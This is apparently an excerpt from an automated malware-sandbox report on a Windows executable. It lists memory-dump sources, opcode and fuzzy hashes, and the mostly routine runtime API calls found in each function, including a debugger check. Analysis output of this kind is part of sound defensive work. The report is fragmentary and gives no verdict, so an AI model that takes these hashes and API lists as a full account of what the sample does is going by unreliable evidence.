                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: G=$G=
                                                                                                                                                                                                                                                                                                  • API String ID: 0-2121552906
                                                                                                                                                                                                                                                                                                  • Opcode ID: 84c6b3c7577c3d8be5159056f1df0cc0a083e065d44da9bff4d557b3e001d670
                                                                                                                                                                                                                                                                                                  • Instruction ID: ccf49caa7656de497895f0ba48d7006a030e5087d5620a81466abe38f4470df7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84c6b3c7577c3d8be5159056f1df0cc0a083e065d44da9bff4d557b3e001d670
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F10B75E002199FDF15CF69D880BADB7B2EF48314F26826DE819EB394D7309D458B90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,003D1286,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 003DBD46
                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003D1286,?,?,?,00000055,?,-00000050,?,?), ref: 003DBD71
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 003DBED4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                                                                  • API String ID: 607553120-905460609
                                                                                                                                                                                                                                                                                                  • Opcode ID: c1374ea0395b97b4f4511c212d2d44c3cc1e902744947c41957fcbbe67b27482
                                                                                                                                                                                                                                                                                                  • Instruction ID: c3f47458bc347ab8741a9ec362e02dfcc53d93198a26c5af8ed68b305a9e7bdc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1374ea0395b97b4f4511c212d2d44c3cc1e902744947c41957fcbbe67b27482
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2771B473600205EADB27AB75FC46BB6B3A9EF44740F16442BF6059B791EB70E9408760
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8dad789afd6d51dda9cbc5801a1597c603c4f5d55282779db2e220a882f4d380
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8f2f52c2540faa809a0ccb48f881e5cc729e840a90b591bd61e43a9c14509ab6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dad789afd6d51dda9cbc5801a1597c603c4f5d55282779db2e220a882f4d380
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FB15733E042569FDB138F68D881BEEBBA5EF55310F15816BE805AB341D6349E05C7A2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 003C67EB
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 003C68B7
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003C68D0
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 003C68DA
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 0040BF4F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00408678: __call_reportfault.LIBCMT ref: 00408685
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __call_reportfault__invoke_watson
                                                                                                                                                                                                                                                                                                  • String ID: T$B
                                                                                                                                                                                                                                                                                                  • API String ID: 3340580077-3406809993
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC0EC
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC136
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC1FC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 661929714-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 003CD301
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 003CD30B
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 003CD318
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003D4C5B,?,?,00000008,?,?,003E1825,00000000), ref: 003D4E8D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003C62D2
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
Uniqueness
Uniqueness Score: -1.00%

Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Strings
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
  • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC33F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c85d4f4a4e623fb9ef8baac51d7ac9a2d826866cf95ba8f652f077f38fe9087
                                                                                                                                                                                                                                                                                                  • Instruction ID: b74cbf97022a0c3df1bbfe93e3092e543a4461bcc068fe9370ee8ddf7b65464b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c85d4f4a4e623fb9ef8baac51d7ac9a2d826866cf95ba8f652f077f38fe9087
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC21A177620207ABEB2A9F25EC42EBA77ACEF44300F11506BF905DA241EA78ED40C750
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003DC098,00000001,00000000,?,-00000050,?,003DC6C9,00000000,?,?,?,00000055,?), ref: 003DBFE4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 85119a2416e634350b3741fd05004e4119f1e0f8b0932266583dfb907a20d51b
                                                                                                                                                                                                                                                                                                  • Instruction ID: b66919ee1d4132f43a695692f2ac918096b0b807519d1ac1ef6876ad1907ad7c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85119a2416e634350b3741fd05004e4119f1e0f8b0932266583dfb907a20d51b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E114C3B210701DFDB199F39D8915BAB791FF84758B16452EEA4747B40D771B802CB40
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,003DC2B4,00000000,00000000,?), ref: 003DC546
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ce4348bab2b68b56af713996d8143894c25bc3737671fa397002dd2966c50859
                                                                                                                                                                                                                                                                                                  • Instruction ID: 58dec33cd02df2730bd7c8df23bdd9f010105f473dc7349b4d7bc613c944f9ba
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce4348bab2b68b56af713996d8143894c25bc3737671fa397002dd2966c50859
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0F933930117BBDF269A61AC45ABA7759EF41754F060426EC06A3280DA30FE41C590
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003DC2EB,00000001,?,?,-00000050,?,003DC68D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 003DC057
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f7967671554772ad98cbfe8adbac8c58636cd5d46786f983dcc59f392099812e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 49d262c687c2ab29b2fd8054bfb168ded665272b110323c72cf34847042f265c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7967671554772ad98cbfe8adbac8c58636cd5d46786f983dcc59f392099812e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0F6372203059FDB265F79EC81ABABB95FF80768F05442EFA468B790C6719C02CB50
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003CD557: EnterCriticalSection.KERNEL32(?,?,003D3F89,?,003ED208,00000008,003D414D,?,003CB2B6,?), ref: 003CD566
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003D52A6,00000001,003ED2C8,0000000C,003D56D5,00000000), ref: 003D52EB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003DBE80,00000001,?,?,?,003DC6EB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 003DBF5E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,003D1DEC,?,20001004,00000000,00000002,?,?,003D13EE), ref: 003D580D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00006947,003C5DE2), ref: 003C6940
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3471368781-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 003C9557
                                                                                                                                                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 003C9665
                                                                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 003C97B7
                                                                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 003C97D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 003C8F07
                                                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 003C8F0F
                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 003C8F98
                                                                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 003C8FC3
                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 003C9018
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                  • String ID: Iv<$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 1170836740-1717667600
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(01010520,01010520,?,7FFFFFFF,?,003E09BA,01010520,01010520,?,01010520,?,?,?,?,01010520,?), ref: 003E0790
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003E084B
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003E08DA
